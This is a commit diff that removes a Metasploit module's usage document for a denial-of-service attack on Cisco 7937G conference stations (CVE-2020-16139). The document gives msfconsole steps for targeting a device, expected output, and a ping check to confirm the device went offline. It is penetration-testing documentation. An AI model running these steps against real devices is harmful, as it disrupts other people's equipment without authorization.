parent
d1afe60262
commit
f6581b9518
|
@ -1,30 +0,0 @@
|
||||||
## Vulnerable Application
|
|
||||||
|
|
||||||
1. Obtain a Cisco 7937G Conference Station.
|
|
||||||
2. Enable Web Access on the device (default configuration).
|
|
||||||
3. It has been observed that based on the firmware available from Cisco, all version are likely vulnerable.
|
|
||||||
|
|
||||||
## Verification Steps
|
|
||||||
|
|
||||||
1. Start msfconsole
|
|
||||||
2. Do: `use auxiliary/dos/cisco/CVE-2020-16139`
|
|
||||||
3. Do: `set RHOST 192.168.1.10`
|
|
||||||
4. Do: `run`
|
|
||||||
5. The conference station should become inoperable and then power cycle itself.
|
|
||||||
|
|
||||||
## Options
|
|
||||||
|
|
||||||
1. rhost (required) - Target address
|
|
||||||
|
|
||||||
## Scenarios
|
|
||||||
|
|
||||||
Because both successful and unsuccessful attacks result in the request timing out, there
|
|
||||||
is no way to be sure that the attack was completed. It is recommended to attempt a ping
|
|
||||||
to the device immediately afterward to verify device is offline/reseting.
|
|
||||||
|
|
||||||
```
|
|
||||||
[*] Starting server...
|
|
||||||
[*] 192.168.110.209 - Sending DoS packets. Stand by.
|
|
||||||
[*] 192.168.110.209 - DoS reset attack completed!
|
|
||||||
[*] Auxiliary module execution completed
|
|
||||||
```
|
|
Loading…
Reference in New Issue